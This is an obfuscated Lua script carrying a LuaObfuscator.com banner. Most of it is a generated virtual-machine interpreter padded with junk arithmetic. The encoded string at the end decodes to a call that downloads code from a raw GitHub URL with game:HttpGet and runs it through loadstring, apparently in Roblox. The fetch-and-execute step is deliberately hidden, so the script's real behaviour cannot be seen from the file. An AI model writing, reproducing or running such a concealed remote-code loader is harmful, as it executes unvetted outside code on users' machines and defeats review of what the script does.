--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v30=nil;function v30(v31,v32,v33)local v34=0;local v35;local v36;local v37;while true do if (v34==0) then v35=v31[1];v36=v31[2];v34=1;end if (v34==1) then v37=v31[3];return function(...)local v77=1;local v78= -1;local v79={...};local v80=v12("#",...) -1 ;local function v81()local v84=v35;local v85=v36;local v86=v37;local v87=v28;local v88={};local v89={};local v90={};for v94=300 -(269 + 31) ,v80 do if (((6501 -3121)>(1295 + 1397)) and (v94>=v86)) then v88[v94-v86 ]=v79[v94 + (1402 -(1349 + 52)) ];else v90[v94]=v79[v94 + (1 -0) ];end end local v91=(v80-v86) + (1938 -(1048 + 889)) ;local v92;local v93;while true do local v95=0 + 0 ;local v96;while true do if ((v95==(0 + 0)) or ((2909 -(54 + 533))>=(17194 -13346))) then v96=1172 -(199 + 973) ;while true do if ((((2518 + 1582) -(75 + 957))<(60 + 3515)) and ((1 + 0)==v96)) then if (((590 + 498 + 14)<(7411 -5837)) and (v93<=(4 -2))) then if (((4566 -(1697 + 246))<(13798 -8844)) and (v93<=(309 -(95 + 214)))) then v90[v92[(2 + 2) -2 ]]=v92[774 -(60 + 711) ];elseif (((492 + 2031)<=(14649 -10897)) and (v93==(1 -0))) then local v123=1988 -(732 + 1256) ;local v124;local v125;while true do if (((5007 -(421 + 741))>=(78 + 2193)) and (v123==(1803 -(1222 + 580)))) then while true do if (((4689 -(411 + 1138))>985) and (v124==0)) then v125=v92[1 + 1 ];v90[v125]=v90[v125](v13(v90,v125 + (4 -3) ,v78));break;end end break;end if ((v123==(0 + 0)) or ((2972 + 1051)>=(5996 -(422 + 680)))) then v124=0 + 0 ;v125=nil;v123=2 -1 ;end end else local v126=0 -0 ;local v127;local v128;local v129;local v130;local v131;local v132;while true do if (((628 + 262)<(3348 -2212)) and (v126==(0 + 0))) then v127=0 + 0 ;v128=nil;v126=1 + 0 ;end if ((v126==(1 + 2)) or ((3523 -(116 + 1130))<=(2011 -479))) then while true do if ((v127==(2 -1)) or ((2680 -(89 + 1572))<(1132 -555))) then local v154=0;while true do if (((5689 -3910)<(3979 -(900 + 267))) and (v154==(2 -1))) then v127=2 + 0 ;break;end if (((6 + 4683)>=(728 -(124 + 232))) and (v154==(0 -(0 + 0)))) then v130=nil;v131=nil;v154=(617 -(444 + 171)) -(1194 -(531 + 662)) ;end end end if (((62 -18)<=((4999 -(11 + 12)) -(244 + 380))) and ((9 -7)==v127)) then v132=nil;while true do if ((v128==(1 -0)) or ((5779 -(339 + 477))<=(3232 + (364 -213)))) then local v163=0 + 0 ;local v164;while true do if ((v163==((1581 -(298 + 1283)) -(194 -(37 + 157)))) or ((211 + 415)>=(343 + (847 -479)))) then v164=0 + 0 ;while true do if ((v164==1) or ((1936 -(464 + 507))<=(722 + 150))) then v128=56 -(12 + (279 -(65 + 172))) ;break;end if ((((1942 -(937 + 443)) + 264)<(12969 -8246)) and (v164==(0 + 0))) then local v190=0 -(0 -0) ;while true do if ((v190==(1 -0)) or ((181 + 900)==(899 + 1011))) then v164=1 + 0 ;break;end if ((v190==(1022 -(161 + 861))) or ((1437 + 999)>=(4127 -(57 + 1567)))) then v78=(v131 + v129) -1 ;v132=0 + (1307 -(1139 + 168)) ;v190=1 + 0 ;end end end end break;end end end if ((v128==(4 -2)) or (((1566 + 338) -879)>(5351 -(1179 + 251 + 206)))) then for v173=v129,v78 do local v174=0 -0 ;while true do if ((v174==(0 + 0)) or ((3479 -(69 + 141))<(2665 -(857 + 284)))) then v132=v132 + (2 -1) ;v90[v173]=v130[v132];break;end end end break;end if (((1944 + 2178)>=(3420 -1297)) and (v128==(0 -0))) then local v165=0 -0 ;local v166;while true do if ((v165==(0 + 0)) or ((15176 -11702)>=(4925 -(202 + 78)))) then v166=0 + (1136 -(18 + 1118)) ;while true do if (((1141 + 920)>(3525 -(1632 + 75))) and (v166==(1014 -(43 + 293 + (1998 -(1148 + 172)))))) then local v191=0 -0 ;while true do if (((0 -0)==v191) or ((1963 + 147)>=(3840 -(1249 + 16 + 447)))) then v129=v92[2 + 0 ];v130,v131=v87(v90[v129](v13(v90,v129 + 1 + 0 ,v92[2 + 1 ])));v191=2 -1 ;end if (((1152 + 1481)<=(4887 -1943)) and ((1 -0)==v191)) then v166=1845 -(1020 + 824) ;break;end end end if ((((7573 -4681) -(253 + 372))==(232 + (3892 -1857))) and (v166==(1 + 0))) then v128=785 -(387 + 397) ;break;end end break;end end end end break;end if ((v127==(0 + 0)) or ((10921 -8073)<(2003 -(187 + 128)))) then local v155=815 -(405 + 410) ;while true do if ((v155==(0 + 0)) or ((11486 -6809)<(2682 + 192))) then v128=0 -0 ;v129=nil;v155=30 -(14 + 15) ;end if ((v155==1) or ((890 -442)>(8016 -4256))) then v127=373 -(133 + 239) ;break;end end end end break;end if (((4381 -(324 + 301))>(2483 -1506)) and (v126==(1 + (0 -0)))) then v129=nil;v130=nil;v126=206 -(173 + 31) ;end if ((v126==(9 -7)) or ((2828 + 993)<(1386 + (1698 -(420 + 719))))) then v131=nil;v132=nil;v126=3 + 0 ;end end end elseif ((v93<=((2 -1) + 1 + 2)) or ((6841 -(3793 -(88 + 1014)))<=(2209 -(977 -(59 + 3))))) then if (((5255 -(1325 + 430))<=(3684 + 80)) and (v93==(1350 -(729 + 618)))) then v90[v92[1 + 1 ]]();else v90[v92[2 + 0 ]]=v33[v92[(1184 + 281) -(35 + 8 + 1419) ]];end elseif (((2425 -(265 + 1245))<=(2928 + 865)) and (v93==(1296 -(276 + 1015)))) then do return;end else local v135=0;local v136;local v137;local v138;while true do if ((v135==(1 + 0 + 0)) or ((3734 -(814 + 582))==(12310 -8360))) then v138=nil;while true do if (((235 + 345)>(149 + 115)) and ((1725 -(269 + 1456))==v136)) then local v156=(0 + 0) -0 ;while true do if ((v156==(1493 -(273 + 1219))) or (3462<=(1134 + (1583 -(228 + 919))))) then v136=1239 -(679 + 559) ;break;end if (((2609 + 1582)>((4063 -(989 + 163)) -(4 + 1462))) and ((0 + 0)==v156)) then v137=v92[(276 + 624) -(375 + 523) ];v138=v90[v92[(1913 -(1229 + 673)) -8 ]];v156=3 -2 ;end end end if ((v136==(82 -(22 + 59))) or ((164 + 468)>=(3649 -((2264 -1799) + 136)))) then v90[v137 + ((1110 -(842 + 266)) -1) ]=v138;v90[v137]=v138[v92[4]];break;end end break;end if (((1110 + 3560)>(411 + 1333)) and (v135==(873 -(201 + 672)))) then v136=0 + (0 -0) ;v137=nil;v135=1 -(0 -0) ;end end end v77=v77 + (1382 -(829 + 123 + 429)) ;break;end if (((1719 + 2620)>=(1099 + 643)) and (v96==0)) then local v108=0 -0 ;while true do if (((0 -0)==v108) or ((2789 -(351 + 689))>(5457 -2703))) then v92=v84[v77];v93=v92[1593 -(488 + 1104) ];v108=1077 -(668 + 408) ;end if (((1320 -(630 + 689))==v108) or ((623 -(125 + 21))>=(2028 + 535))) then v96=3 -2 ;break;end end end end break;end end end end A,B=v28(v11(v81));if  not A[1] then local v97=0;local v98;while true do if (v97==0) then v98=v31[4][v77] or "?" ;error("Script error at ["   .. v98   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end end end return v30(v29(),{},v17)(...);end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v38)if (v1(v38,2)==79) then v20=v0(v3(v38,1,1));return "";else local v70=v2(v0(v38,16));if v20 then local v82=v5(v70,v20);v20=nil;return v82;else return v70;end end end);v21=nil;v18=1;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v39=0 + 0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39~=2) then else v44=nil;v45=nil;v39=398 -(244 + 151) ;end if (v39==(469 -(372 + 97))) then v40=0;v41=nil;v39=1 + 0 ;end if ((723 -(223 + 499))==v39) then v42=nil;v43=nil;v39=2;end if (v39~=(1401 -(671 + 727))) then else v46=nil;while true do local v83=0;while true do if (v83==0) then if (2==v40) then local v104=0;while true do if (v104~=(0 + 0)) then else for v110=1,v24() do local v111=0 + 0 ;local v112;local v113;while true do if (v111~=0) then else v112=0;v113=nil;v111=1 + 0 ;end if (v111==(2 -1)) then while true do if (v112~=0) then else v113=v22();if (v21(v113,1 + 0 ,423 -(301 + 121) )~=(0 + 0)) then else local v147=0 + 0 ;local v148;local v149;local v150;local v151;while true do if ((1460 -(1291 + 168))==v147) then local v160=0;while true do if (v160==0) then v150=nil;v151=nil;v160=1;end if (v160==(1211 -(1034 + 176))) then v147=2;break;end end end if (v147~=(0 + 0)) then else local v161=0 -0 ;while true do if (v161~=0) then else v148=0 + 0 ;v149=nil;v161=1;end if ((2 -1)==v161) then v147=2 -1 ;break;end end end if (v147~=(5 -3)) then else while true do if (v148==(477 -(450 + 24))) then if (v21(v150,654 -(556 + 95) ,3)~=1) then else v151[4]=v46[v151[15 -11 ]];end v41[v110]=v151;break;end if (v148~=(3 -2)) then else local v170=0;while true do if (v170==(1 + 0)) then v148=4 -2 ;break;end if (v170~=0) then else v151={v23(),v23(),nil,nil};if (v149==(698 -(647 + 51))) then local v187=0 -0 ;local v188;local v189;while true do if (v187~=(1 + 0)) then else while true do if (0==v188) then v189=0 -0 ;while true do if ((1420 -(727 + 693))==v189) then v151[3]=v23();v151[4]=v23();break;end end break;end end break;end if (v187~=(1484 -(685 + 799))) then else v188=0 -0 ;v189=nil;v187=1;end end elseif (v149==1) then v151[8 -5 ]=v24();elseif (v149==2) then v151[451 -(382 + 66) ]=v24() -((3 -1)^(1037 -(220 + 801))) ;elseif (v149~=3) then else local v197=0;local v198;local v199;while true do if (v197==(558 -(314 + 244))) then v198=0 + 0 ;v199=nil;v197=1;end if (v197~=1) then else while true do if (v198==(0 + 0)) then v199=0;while true do if (0==v199) then v151[5 -2 ]=v24() -((1 + 1)^(1593 -(512 + 1065))) ;v151[1139 -(162 + 973) ]=v23();break;end end break;end end break;end end end v170=1;end end end if (v148~=0) then else local v171=0;local v172;while true do if (v171==0) then v172=0 -0 ;while true do if (v172==(0 + 0)) then local v192=0;while true do if (v192~=(0 -0)) then else v149=v21(v113,2,21 -(10 + 8) );v150=v21(v113,1173 -(944 + 225) ,6 + 0 );v192=1 + 0 ;end if (v192==1) then v172=1;break;end end end if (v172~=(1191 -(553 + 637))) then else v148=1766 -(224 + 1541) ;break;end end break;end end end if (v148==(181 -(107 + 72))) then if (v21(v150,129 -(58 + 70) ,1291 -(1200 + 90) )==1) then v151[4 -2 ]=v46[v151[2 + 0 ]];end if (v21(v150,2,404 -(211 + 191) )~=(1 + 0)) then else v151[3 + 0 ]=v46[v151[144 -(105 + 36) ]];end v148=3;end end break;end end end break;end end break;end end end for v114=1 + 0 ,v24() do v42[v114-(1 -0) ]=v29();end v104=1;end if (v104~=(1 + 0)) then else for v116=1 + 0 ,v24() do v43[v116]=v24();end return v44;end end end if (v40~=0) then else local v105=1207 -(928 + 279) ;while true do if (1==v105) then local v109=0;while true do if (v109==(1565 -(652 + 913))) then v43={};v44={v41,v42,nil,v43};v109=1;end if (1==v109) then v105=2 + 0 ;break;end end end if (v105==(8 -6)) then v40=1;break;end if (v105~=(0 -0)) then else v41={};v42={};v105=3 -2 ;end end end v83=1;end if (v83==1) then if (v40==1) then local v106=0;local v107;while true do if (v106==(0 -0)) then v107=0 -0 ;while true do if (2~=v107) then else v40=2;break;end if (v107==0) then v45=v24();v46={};v107=1 + 0 ;end if (v107==1) then local v120=1423 -(1363 + 60) ;while true do if (v120==0) then for v140=1,v45 do local v141=1160 -(364 + 796) ;local v142;local v143;local v144;local v145;local v146;while true do if (v141==(0 + 0)) then v142=0;v143=nil;v141=1 + 0 ;end if (v141==2) then v146=nil;while true do if (v142==1) then v145=nil;v146=nil;v142=2;end if (v142==(0 + 0)) then local v162=0;while true do if (v162==1) then v142=1;break;end if (v162~=(1873 -(1466 + 407))) then else v143=0;v144=nil;v162=1;end end end if (v142==(1 + 1)) then while true do if (v143~=0) then else local v175=0;while true do if (v175~=0) then else v144=824 -(16 + 808) ;v145=nil;v175=1 -0 ;end if (v175~=(1 + 0)) then else v143=1211 -(1208 + 2) ;break;end end end if (v143==(1 + 0)) then v146=nil;while true do if (0==v144) then local v184=1602 -(1406 + 196) ;local v185;while true do if (v184==(0 -0)) then v185=0 -0 ;while true do if (v185==(65 -(44 + 20))) then v144=1 -0 ;break;end if (v185~=(0 + 0)) then else local v196=0 -0 ;while true do if (v196~=(2 -1)) then else v185=2 -1 ;break;end if (v196==0) then v145=v22();v146=nil;v196=1;end end end end break;end end end if (v144==(3 -2)) then if (v145==(1 + 0)) then v146=v22()~=(0 -0) ;elseif (v145==2) then v146=v25();elseif (v145~=(1 + 2)) then else v146=v26();end v46[v140]=v146;break;end end break;end end break;end end break;end if (1==v141) then v144=nil;v145=nil;v141=2;end end end v44[1 + 2 ]=v22();v120=2 -1 ;end if (v120==(2 -1)) then v107=244 -(80 + 162) ;break;end end end end break;end end end break;end end end break;end end end v18=5;end if (v18==2) then function v23()local v47=0;local v48;local v49;while true do if (v47==((0 -0) + 0)) then v48,v49=v1(v16,v19,v19 + (3 -1) );v19=v19 + (1349 -(536 + 811)) ;v47=1 + 0 ;end if (v47==(1 -0)) then return (v49 * (180 + 76)) + v48 ;end end end v24=nil;function v24()local v50,v51,v52,v53=v1(v16,v19,v19 + 2 + 1 );v19=v19 + (1532 -(986 + 542)) ;return (v53 * (41176813 -(24400915 -(941 + 377)))) + (v52 * ((48342 + 17773) -(161 + 418))) + (v51 * (897 -(505 + 136))) + v50 ;end v25=nil;v18=3;end if (3==v18) then function v25()local v54=850 -(631 + (459 -240)) ;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v54==(1209 -((1990 -(1073 + 862)) + 1154))) then v55=v24();v56=v24();v54=(1 -0) + 0 ;end if (v54==(1 + 2)) then if (v59==(0 + 0)) then if (v58==(0 + 0)) then return v60 * 0 ;else local v99=0 + 0 ;while true do if (v99==(0 -0)) then v59=1;v57=659 -(630 + 29) ;break;end end end elseif (v59==((696 + 9059) -7708)) then return ((v58==(1747 -((1385 -858) + 1220))) and (v60 * ((485 -(385 + 99))/0))) or (v60 * NaN) ;end return v8(v60,v59-(12 + 1011) ) * (v57 + (v58/(((1113 -440) -(35 + 636))^52))) ;end if (v54==(1338 -(506 + 830))) then v59=v21(v56,1 + 20 ,81 -50 );v60=((v21(v56,4 + 28 )==(1 -0)) and  -(1 -0)) or (1056 -(862 + 193)) ;v54=10 -(27 -20) ;end if (v54==((1072 -(909 + 162)) -0)) then v57=1 + 0 ;v58=(v21(v56,(1661 -458) -(671 + 531) ,277 -(106 + 29 + 122) ) * ((2 + 0)^(63 -31))) + v55 ;v54=7 -5 ;end end end v26=nil;function v26(v61)local v62;if  not v61 then v61=v24();if (v61==(0 -0)) then return "";end end v62=v3(v16,v19,(v19 + v61) -(708 -(455 + 252)) );v19=v19 + v61 ;local v63={};for v68=1 + 0 , #v62 do v63[v68]=v2(v1(v3(v62,v68,v68)));end return v6(v63);end v27=v24;v18=4;end if (v18==1) then function v21(v64,v65,v66)if v66 then local v71=0 + 0 ;local v72;while true do if (v71==(0 + 0)) then v72=(v64/(2^(v65-((3962 -(1734 + 265)) -(560 + 1402)))))%(2^(((v66-(539 -(214 + (1585 -1261)))) -(v65-(2 -1))) + 1)) ;return v72-(v72%(1687 -(1214 + 472))) ;end end else local v73=(362 -(312 + 48))^(v65-(1 -0)) ;return (((v64%(v73 + v73))>=v73) and ((2 + 0) -1)) or 0 ;end end v22=nil;function v22()local v67=v1(v16,v19,v19);v19=v19 + 1 ;return v67;end v23=nil;v18=2;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403383O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F475448534352495054532F7465732F6D61696E2F746500083O0012043O00013O001204000100023O00200600010001000300122O000300044O0002000100034O00015O00022O00033O000100012O00053O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
